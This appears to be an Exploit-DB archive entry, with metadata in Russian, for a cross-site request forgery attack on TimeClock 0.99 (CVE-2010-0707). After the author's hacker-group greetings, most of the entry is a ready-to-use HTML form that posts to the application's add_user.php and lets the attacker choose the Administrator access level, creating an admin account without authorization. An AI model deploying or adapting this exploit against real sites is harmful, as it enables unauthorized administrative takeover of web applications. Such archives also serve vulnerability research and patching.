Exploit TimeClock 0.99 - Cross-Site Request Forgery (Add Admin)

[Exploiter]

EDB-ID

11516

Проверка EDB

1. Пройдено

Автор

VIRUSMAN

Тип уязвимости

WEBAPPS

Платформа

PHP

CVE

cve-2010-0707

Дата публикации

2010-02-20

==============================================================================
        [»] ~ Note : [ Tribute to the martyrs of Gaza . ]
==============================================================================
        [»] TimeClock Remote Add Admin Exploit
==============================================================================

    [»] Script:             [ TimeClock ]
    [»] Language:           [ PHP ]
    [»] Site page:          [ timeclock-software is a free open-source application released under the GP. ]
    [»] Download:           [ http://www.hormiga.org/zonamac/descargas/timeclock-software.zip ]
    [»] Founder:            [ ViRuSMaN <[email protected] - [email protected]> ]
    [»] Greetz to:          [ HackTeach Team , Egyptian Hackers , All My Friends & Pentestlabs.Com ]
    [»] My Home:            [ HackTeach.Org , Islam-Attack.Com ]

###########################################################################

===[ Exploit ]===

<html>
<head>
<title>TimeClock Remote Add Admin Exploit[By:MvM]</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>

<body>

<form method="post" action="http://localhost/scripts/add_user.php">
<table border="1">
<tr>
<td align="center"><b>Adding User</b></td>
</tr>
<tr>
<td>
<table>
<tr>
<td align="right">First Name:&nbsp;</td><td align="left"><input type="text" name="fname" size="30"></td>
</tr>
<tr>
<td align="right">Last Name:&nbsp;</td><td align="left"><input type="text" name="lname" size="30"></td>
</tr>
<tr>
<td align="right">Access Level:&nbsp;</td>
<td>
<select name="access_level">
<option value="Administrator">Administrator</option>
<option value="User">User</option>
</select>
</td>
</tr>
<tr>
<td align="right">Username:&nbsp;</td><td align="left"><input type="text" name="u_name" size="30"></td>
</tr>
<tr>
<td align="right">Password:&nbsp;</td><td align="left"><input type="text" name="user_password" size="30"></td>
</tr>
<tr>
<td>&nbsp;</td><td><input type="submit" name="submit" value="Add" class="button">&nbsp;<input type="submit" name="cancel" value="Cancel" class="button"></td>
</tr>
</table>
</td>
</tr>
</table>
</form>
</body>
</html>

Author: ViRuSMaN <-

###########################################################################